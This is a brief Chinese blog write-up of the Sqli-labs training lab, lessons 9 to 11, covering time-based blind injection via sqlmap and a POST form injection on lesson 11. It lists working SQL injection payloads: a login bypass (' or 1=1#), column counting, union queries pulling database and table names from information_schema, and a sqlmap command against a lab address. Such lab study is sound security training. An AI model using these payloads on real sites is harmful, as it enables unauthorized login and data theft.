Sqli-labs - GET & POST注入 - LESS 9 - 11

GET - Blind - Time based - Single Quotes

GET - Blind - Time based - Double Quotes

以上两题,可用sqlmap解答

POST - Error Based - Single quotes - String

POST表单注入,先用万能密码,尝试报错

如图,尝试在用户名的地方使用万能密码,最后总是在密码的地方报错

说明单引号闭合的地方是跟在密码后面

在用户名的地方随便输入,在密码处输入

' or 1=1#

使得判断条件为真,登陆成功

猜字段

' order by 2#

数据库名

' union select database(),2#

表名

' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

接下步骤不再赘述

当然sqlmap也能POST注入

sqlmap -u http://192.168.147.133/Less-11/ --form --batch --dbs

posted @ 2020-05-09 11:10  ch0bits  阅读(161)  评论(0编辑  收藏  举报